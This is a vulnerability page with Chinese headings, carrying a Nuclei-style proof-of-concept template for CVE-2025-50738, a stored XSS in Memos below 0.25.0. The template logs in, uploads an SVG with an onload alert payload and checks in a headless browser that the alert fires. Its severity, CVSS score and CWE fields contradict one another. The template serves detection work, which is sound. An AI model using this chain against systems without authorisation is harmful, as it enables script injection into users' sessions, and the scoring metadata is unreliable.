漏洞描述
An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
CVE-2025-50738: Memos < 0.25.0 - Stored Cross-Site Scripting
PoC代码[已公开]
id: CVE-2025-50738
info:
name: Memos < 0.25.0 - Stored Cross-Site Scripting
author: SeongHyeonJeon[nukunga]
severity: medium
description: |
An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
reference:
- https://github.com/usememos/memos/issues/4707
- https://github.com/advisories/GHSA-hfcf-79gh-f3jc
- https://nvd.nist.gov/vuln/detail/CVE-2025-50738
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
cvss-score: 9.8
cwe-id: CWE-200
metadata:
verified: true
max-request: 3
tags: cve,cve2025,xss,memos,authenticated,headless
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{rand_base(8)}}"
http:
- raw:
- |
POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
- |
POST /api/v1/resources HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"filename": "{{filename}}.svg",
"content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
"type": "image/svg+xml"
}
extractors:
- type: regex
name: resource_id
internal: true
part: body
group: 1
regex:
- '"name":"resources/([A-Za-z0-9]+)"'
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}/file/resources/{{resource_id}}/{{filename}}.svg"
- action: waitdialog
name: xss_alert
matchers:
- type: dsl
dsl:
- xss_alert == true
- xss_alert_message == "1"
- xss_alert_type == "alert"
condition: and
# digest: 4a0a00473045022100ce3c86a562055b8e07c0df1d0c67052f766dd955fefed68ae501453ed3cf63ee02207401fb21456121d6532f3e38fe8bae8913ef50c2400642257b92a8fbcc5d0321:922c64590222798bb761d5b6d8e72950